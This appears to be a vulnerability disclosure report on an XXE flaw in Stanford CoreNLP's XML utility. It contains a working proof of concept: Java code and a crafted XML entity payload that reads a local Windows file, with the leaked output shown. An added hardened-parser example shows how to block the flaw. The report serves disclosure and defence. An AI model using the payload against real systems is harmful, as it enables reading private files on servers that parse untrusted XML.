Improper Restriction of XML External Entity Reference in stanfordnlp/corenlp
Status: Valid
Reported on Sep 29th 2021
✍️ Description
The Stanford CoreNLP package, which provides a set of natural language analysis tools written in Java, parses XML with a configuration that is vulnerable to XML External Entity (XXE) injection. An attacker who is able to supply a crafted XML file as input to the getTextContentFromTagsFromFile() function in "XMLUtils.java" can have external entities resolved during parsing, including exposing the contents of local files to a remote server.
🕵️♂️ Proof of Concept
package xxe_poc;

import java.io.File;
import java.util.List;
import edu.stanford.nlp.util.XMLUtils;

public class Poc {
    public static void main(String[] args) {
        // Attacker-controlled XML file (see sample.xml below); the path is local to the reporter's workspace.
        File file = new File("C:\\Users\\[user]\\eclipse-workspace\\xxe_poc\\src\\main\\resources\\sample.xml");
        // The vulnerable helper parses the file and returns the text content of every <lastName> element.
        List<String> returnList = XMLUtils.getTextContentFromTagsFromFile(file, "lastName");
        System.out.print(returnList);
    }
}
sample.xml
<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///c:/windows/win.ini"> ]>
<userInfo>
    <firstName>John</firstName>
    <lastName>&ent;</lastName>
</userInfo>
Check the Output:
[; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
]
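The fix for this class of bug is to configure the DOM parser so that a DOCTYPE, and therefore any entity declaration, is rejected before parsing continues. The following is an added example, not CoreNLP's own code or the reporter's patch: a hardened replacement for a "text content from tags" helper, using the DocumentBuilderFactory settings recommended by OWASP's XXE prevention guidance. The class and method names (SafeXmlTextExtractor, getTextContentFromTags, hardenedFactory) are assumptions, and the second input is a constructed document in the shape of the report's sample.xml with a placeholder path instead of a real file.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;

import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.SAXException;

/** Hardened "text content from tags" helper (added example; not CoreNLP's XMLUtils). */
public final class SafeXmlTextExtractor {

    // Hypothetical hardened factory; the actual CoreNLP parser configuration is not shown on this page.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Reject any DOCTYPE outright, so no internal or external entity can be declared at all.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case a different parser implementation ignores the feature above.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        // JAXP secure processing additionally limits entity expansion and external access.
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        return f;
    }

    /** Returns the text content of every element named tagName; throws if the document carries a DOCTYPE. */
    public static List<String> getTextContentFromTags(InputStream in, String tagName)
            throws ParserConfigurationException, SAXException, IOException {
        DocumentBuilder builder = hardenedFactory().newDocumentBuilder();
        Document doc = builder.parse(in);
        NodeList nodes = doc.getElementsByTagName(tagName);
        List<String> out = new ArrayList<>();
        for (int i = 0; i < nodes.getLength(); i++) {
            out.add(nodes.item(i).getTextContent());
        }
        return out;
    }

    private static InputStream asStream(String xml) {
        return new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8));
    }

    public static void main(String[] args) throws Exception {
        // Constructed benign input: no DOCTYPE, so it parses normally.
        String benign = "<?xml version=\"1.0\"?>"
                + "<userInfo><firstName>John</firstName><lastName>Doe</lastName></userInfo>";
        System.out.println(getTextContentFromTags(asStream(benign), "lastName"));

        // Constructed input in the shape of the report's sample.xml; the entity target is a placeholder, not a real file.
        String withDoctype = "<?xml version=\"1.0\"?>"
                + "<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///PLACEHOLDER_PATH\">]>"
                + "<userInfo><lastName>&ent;</lastName></userInfo>";
        try {
            getTextContentFromTags(asStream(withDoctype), "lastName");
            System.out.println("unexpected: DOCTYPE was accepted");
        } catch (SAXException e) {
            // With disallow-doctype-decl the parser stops here, before any entity is resolved.
            System.out.println("rejected as expected: " + e.getMessage());
        }
    }
}
```

The first feature alone closes the hole for the JDK's built-in Xerces parser; the remaining settings matter when the factory is provided by another implementation or when a DOCTYPE must be tolerated for legitimate input, in which case external entity resolution and DTD loading are disabled instead.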
We created a GitHub Issue asking the maintainers to create a SECURITY.md
@maintainer Please find the patch at https://github.com/srikanthprathi/CoreNLP/pulls
We have contacted a member of the stanfordnlp/corenlp team and are waiting to hear back
